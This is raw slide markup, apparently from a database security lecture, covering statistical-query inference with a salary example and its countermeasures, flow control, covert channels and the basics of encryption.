              <a:t>, especially when the conditions result in a population consisting of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 small number of tuples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7413" name="文字方塊 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="573088" y="2493963"/>
            <a:ext cx="801052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Q1: SELECT COUNT(*) FROM PERSON WHERE &lt;condition&gt;;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pP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Q2: SELECT AVG(Income) FROM PERSON WHERE &lt;condition&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="266700" indent="-2667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Interested in finding the Salary of Jane Smith, and we know her with</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="266700" indent="-266700">
              <a:defRPr/>
            </a:pP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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" baseline="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Last_degree</a:t>
            </a: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=‘Ph.D.’ AND Sex=‘F’ AND City=‘Bellaire’ AND State=‘Texas’)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If count </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" baseline="0" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t> 3, data can be easily inferred by using MIN, MAX, and AVG</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" baseline="0" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:ea typeface="新細明體" pitchFamily="18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54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Solutions to Information Inferring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>
          <a:xfrm>
            <a:off x="312738" y="911225"/>
            <a:ext cx="8774112" cy="3709988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No statistical queries are permitted whenever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number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t> of tuples in the population specified by the selection condition falls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below some threshold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To prohibit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sequences of queries </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>that refer repeatedly to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same population </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>of tuples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To introduce slight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inaccuracies or noise </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>into the results of statistical queries deliberately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To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partitioning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t> of the database; Queries can refer to any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complete group(s)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>, but never to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subsets of records </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>within a group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262B78-FBC7-4D38-88D7-F6DFD02C914B}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" baseline="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" baseline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2" y="4849397"/>
            <a:ext cx="6658139" cy="15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21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267700" y="6386513"/>
            <a:ext cx="79057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8B0EF28-2813-4F34-812A-50FE4CFD3290}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" baseline="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600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508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Introduction to Flow Control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35050"/>
            <a:ext cx="8593137" cy="3908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control regulates the distribution or flow of information among accessible objects.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flow between object X and object Y occurs when a program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reads values from X and writes values into Y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Flow controls check that information contained in some objects does not flow explicitly or implicitly into less protected objects.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 flow policy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>specifies the channels along which information is allowed to move.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The simplest flow policy specifies just two classes of information: confidential (C)  and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>nonconfidential</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t> (N), and allows all flows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except those from class C to class N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611437" y="4770438"/>
            <a:ext cx="3938587" cy="1616075"/>
            <a:chOff x="2716213" y="4933950"/>
            <a:chExt cx="3938587" cy="1616075"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19461" name="矩形 6"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2779713" y="5257800"/>
              <a:ext cx="865187" cy="576263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2" name="文字方塊 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2719388" y="4933950"/>
              <a:ext cx="5619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X</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" baseline="0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3" name="文字方塊 8"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3636963" y="5286375"/>
              <a:ext cx="7937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read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4" name="矩形 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4384675" y="5334000"/>
              <a:ext cx="512763" cy="519113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5" name="文字方塊 11"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4048125" y="4933950"/>
              <a:ext cx="1185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program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9466" name="直線單箭頭接點 12"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3749675" y="5668963"/>
              <a:ext cx="612775" cy="1587"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1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7" name="文字方塊 15"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4837113" y="5268913"/>
              <a:ext cx="89852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write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8" name="文字方塊 16"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4387056" y="5873507"/>
              <a:ext cx="900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A flow</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="20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69" name="文字方塊 17"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2716213" y="5776913"/>
              <a:ext cx="1185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Class C</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" baseline="0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70" name="文字方塊 18"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5468938" y="5873750"/>
              <a:ext cx="1185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Class N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71" name="文字方塊 19"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4149201" y="6149975"/>
              <a:ext cx="1568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not allowed</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="20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472" name="矩形 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5584825" y="5278438"/>
              <a:ext cx="511175" cy="576262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19473" name="直線單箭頭接點 12"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4940300" y="5661025"/>
              <a:ext cx="541338" cy="1588"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1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4" name="文字方塊 11"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5614988" y="4933950"/>
              <a:ext cx="5619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Y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238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15350" y="6386513"/>
            <a:ext cx="54292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2BCE0B0-3A6A-4DDE-8693-2AB27F5CE651}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" baseline="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" baseline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7463"/>
            <a:ext cx="8774112" cy="620712"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" b="1">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Covert Channels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682625"/>
            <a:ext cx="8774112" cy="2541588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b="1" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>covert channel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t> allows information to pass from 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higher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t> classification level to 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lower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classification </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>level through improper means.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One way to avoid covert channels is for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programmers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t> to not actually gain access to sensitive data that a program is supposed to process after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program</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t> has been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put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into operation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20485" name="群組 4"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="593725" y="3641725"/>
            <a:ext cx="3459163" cy="1423988"/>
            <a:chOff x="2679039" y="5010150"/>
            <a:chExt cx="3460274" cy="1424018"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20494" name="矩形 5"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2769229" y="5343586"/>
              <a:ext cx="866231" cy="438210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5" name="文字方塊 6"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2709489" y="5010150"/>
              <a:ext cx="5625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X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6" name="文字方塊 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3635460" y="5172075"/>
              <a:ext cx="9919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read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7" name="矩形 8"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5031666" y="5343586"/>
              <a:ext cx="512769" cy="438209"/>
            </a:xfrm>
            <a:prstGeom prst="rect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8" name="文字方塊 9"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4953307" y="5029200"/>
              <a:ext cx="5625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Y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0499" name="直線單箭頭接點 10"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3740005" y="5572185"/>
              <a:ext cx="1213302" cy="1588"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1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0" name="文字方塊 11"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4302877" y="5572185"/>
              <a:ext cx="9002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write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01" name="文字方塊 13"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2679039" y="5781795"/>
              <a:ext cx="11860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Class C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02" name="文字方塊 14"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4953307" y="5791320"/>
              <a:ext cx="11860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Class N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03" name="文字方塊 15"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3310142" y="6034058"/>
              <a:ext cx="22723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A covert channel</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="20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群組 22"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4497388" y="3695700"/>
            <a:ext cx="3484562" cy="1370013"/>
            <a:chOff x="4497388" y="5254625"/>
            <a:chExt cx="3484562" cy="1370013"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="20487" name="Picture 5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975" y="5254625"/>
              <a:ext cx="1071563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4" descr="j01953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725" y="5278438"/>
              <a:ext cx="95250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文字方塊 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4497388" y="6188075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programmer</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" baseline="0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0" name="文字方塊 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7199313" y="6224588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user</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000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491" name="流程圖: 磁碟 22"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6373813" y="5389563"/>
              <a:ext cx="515937" cy="592137"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartMagneticDisk">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFCCFF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0492" name="直線單箭頭接點 10"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="5715455" y="5791880"/>
              <a:ext cx="612000" cy="153987"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="bg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3" name="文字方塊 26"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5826350" y="5538788"/>
              <a:ext cx="3365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x</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US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97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E91A75C-AFB2-4415-BC2A-145C7C98DDCD}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" baseline="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" baseline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6 Encryption and Public Key Infrastructures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1858963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Encryption</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t> consists of applying an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encryption algorithm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to data using some prespecified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encryption key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 resulting data has to be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decrypted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b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using a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decryption key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</a:rPr>
              <a:t>to recover the original data.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00113" y="3336925"/>
            <a:ext cx="7408862" cy="1328738"/>
            <a:chOff x="900113" y="3336925"/>
            <a:chExt cx="7408862" cy="1328738"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="21509" name="群組 19"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4079875" y="3352800"/>
              <a:ext cx="1114425" cy="1295400"/>
              <a:chOff x="5576935" y="5091008"/>
              <a:chExt cx="1113576" cy="947980"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="21520" name="摺角紙張 17"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5576935" y="5091008"/>
                <a:ext cx="1113576" cy="947980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21" name="文字方塊 18"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5631253" y="5103001"/>
                <a:ext cx="941560" cy="675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8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X?%^*&amp;%)</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-TW" sz="1800" baseline="0" dirty="0" err="1">
                    <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                    <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                  </a:rPr>
                  <a:t>I,gS</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-TW" sz="18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#!@ ...</a:t>
                </a:r>
                <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800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1510" name="群組 19"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="900113" y="3336925"/>
              <a:ext cx="1114425" cy="1295400"/>
              <a:chOff x="5576935" y="5091008"/>
              <a:chExt cx="1113576" cy="947980"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="21518" name="摺角紙張 17"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5576935" y="5091008"/>
                <a:ext cx="1113576" cy="947980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19" name="文字方塊 18"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5583664" y="5103001"/>
                <a:ext cx="1059258" cy="47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1511" name="群組 19"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="7194550" y="3370263"/>
              <a:ext cx="1114425" cy="1295400"/>
              <a:chOff x="5576935" y="5091008"/>
              <a:chExt cx="1113576" cy="947980"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="21516" name="摺角紙張 17"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5576935" y="5091008"/>
                <a:ext cx="1113576" cy="947980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 b="1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1517" name="文字方塊 18"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5583664" y="5103001"/>
                <a:ext cx="1059258" cy="47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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="21512" name="直線單箭頭接點 14"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2105025" y="4052888"/>
              <a:ext cx="1843088" cy="1587"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1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3" name="矩形 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2005013" y="3336925"/>
              <a:ext cx="20383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600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encryption algorithm + encryption key  </a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="16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14" name="矩形 18"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5181600" y="3370263"/>
              <a:ext cx="20383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600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decryption algorithm + decryption key  </a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="16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1515" name="直線單箭頭接點 19"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5260975" y="4054475"/>
              <a:ext cx="1843088" cy="1588"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1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355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50" y="5143500"/>
            <a:ext cx="914400" cy="874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8435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05825" y="6386513"/>
            <a:ext cx="552450" cy="387350"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D46E2C23-3A54-4F88-B245-5B4FA7BCDE54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23813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4000" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Control Measures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739775"/>
            <a:ext cx="8774112" cy="4116388"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>Flow Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>To prevents information from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flowing in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>such a way that it reaches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unauthorized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/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Channels</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> that are pathways for information to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flow implicitly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>in ways that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violate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> the security policy of an organization are called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covert channels</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="200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 b="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>Data Encryption</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRP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used to protect sensitive data (such as credit card numbers) that is being transmitted via some type communication network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data is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encoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> using some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coding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
